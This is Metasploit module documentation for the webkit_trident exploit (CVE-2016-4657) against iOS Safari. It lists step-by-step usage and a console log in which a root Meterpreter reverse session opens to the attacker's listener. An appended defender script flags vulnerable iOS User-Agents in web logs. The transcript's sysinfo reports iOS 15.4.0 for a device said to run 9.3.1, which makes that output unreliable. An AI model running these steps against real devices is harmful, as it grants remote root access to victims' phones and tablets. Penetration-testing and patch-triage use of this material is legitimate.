
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/apple_ios/browser/webkit_trident.md

Description

This module exploits a use-after-free (UAF) vulnerability in WebKit's JavaScriptCore library, CVE-2016-4657.

Vulnerable Application

The exploit should work on 32-bit or 64-bit devices running iOS 9.3.4 or earlier, though it has been tested so far on 64-bit devices running 9.3.1.

Verification Steps

  • Start msfconsole

  • use exploit/apple_ios/browser/webkit_trident

  • set LHOST and SRVHOST as appropriate

  • exploit

  • Browse to the given URL with a vulnerable device from Safari

  • Note that the payload is specially created for this exploit, due to sandbox limitations that prevent spawning new processes.

Scenarios

64-bit device (ME279NF/A) running iOS 9.3.1:

msf exploit(apple_ios/browser/webkit_trident) >
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Sent exploit (770048 bytes)
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[+] 192.168.0.101    webkit_trident - Target is vulnerable.
[*] Meterpreter session 1 opened (192.168.0.110:4444 -> 192.168.0.101:52467) at 2018-05-30 14:49:59 +0200

msf exploit(apple_ios/browser/webkit_trident) > sessions -l

Active sessions
===============

  Id  Name  Type                           Information                                    Connection
  --  ----  ----                           -----------                                    ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.0.101  192.168.0.110:4444 -> 192.168.0.101:52467 (192.168.0.101)

msf exploit(apple_ios/browser/webkit_trident) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.101
OS           : iPad4,4 (iOS 15.4.0)
Architecture : arm64
BuildTuple   : aarch64-iphone-darwin
Meterpreter  : aarch64/apple_ios
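The Vulnerable Application section gives the affected range as iOS 9.3.4 or earlier, and the Scenarios transcript shows how Mobile Safari announces its iOS version in the User-Agent header ("CPU OS 9_3_1 like Mac OS X"). The script below is an added defender-side example, not part of the module or of the Metasploit documentation: it parses that version marker out of web-server or proxy log lines and reports clients that fall inside the range the page states, so an administrator can find devices that still need updating. The log line layout (`<ip> "<user-agent>"`) and every User-Agent other than the 9.3.1 one copied from the transcript are constructed for the example; the build and WebKit numbers in them are placeholders, not real device builds.

```python
import re
from typing import List, Optional, Tuple

# Highest iOS version the module documentation lists as affected ("9.3.4 or earlier").
LAST_AFFECTED_IOS = (9, 3, 4)

# Matches the "CPU OS 9_3_1 like Mac OS X" (iPad) or "CPU iPhone OS 9_3_1 like Mac OS X"
# (iPhone/iPod) fragment that Mobile Safari places in its User-Agent header.
_IOS_UA_RE = re.compile(r"CPU (?:iPhone )?OS (\d+(?:_\d+)*) like Mac OS X")


def parse_ios_version(user_agent: str) -> Optional[Tuple[int, ...]]:
    """Return the iOS version from a Mobile Safari User-Agent as a tuple of ints,
    or None when the string carries no iOS version marker."""
    m = _IOS_UA_RE.search(user_agent)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("_"))


def _pad(version: Tuple[int, ...], width: int = 3) -> Tuple[int, ...]:
    # "9_3" means 9.3.0: pad missing components with zeros so tuple comparison is correct.
    return tuple(version) + (0,) * (width - len(version))


def is_in_affected_range(user_agent: str) -> bool:
    """True when the User-Agent identifies iOS at or below 9.3.4 (the range the page lists);
    False for newer iOS releases and for clients that are not Mobile Safari on iOS."""
    version = parse_ios_version(user_agent)
    if version is None:
        return False
    return _pad(version) <= _pad(LAST_AFFECTED_IOS)


def triage_web_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, ios_version) for every request whose client is in the affected range.
    Assumed (constructed) log format: '<client-ip> "<user-agent>"' per line."""
    hits = []
    for line in lines:
        ip, _, rest = line.partition(" ")
        ua = rest.strip().strip('"')
        version = parse_ios_version(ua)
        if version is not None and is_in_affected_range(ua):
            hits.append((ip, ".".join(str(p) for p in version)))
    return hits


# Constructed sample log. The first User-Agent is the one from the Scenarios transcript above;
# the other three are made up to cover a newer release, a two-component version and a
# non-iOS client ("Mobile/BUILD" and the WebKit numbers are placeholders, not real builds).
SAMPLE_LOG = [
    '192.168.0.101 "Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1"',
    '192.168.0.102 "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.0.0 (KHTML, like Gecko) Version/10.0 Mobile/BUILD Safari/602.0"',
    '192.168.0.103 "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/BUILD Safari/601.1"',
    '192.168.0.104 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0 Safari/537.36"',
]

if __name__ == "__main__":
    for ip, ios_version in triage_web_log(SAMPLE_LOG):
        print(f"{ip} reports iOS {ios_version}: inside the affected range (<= 9.3.4)")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file's lines in the same `<ip> "<user-agent>"` shape; a User-Agent is self-reported, so treat a hit as a lead for asset inventory and patch follow-up rather than proof of the installed version.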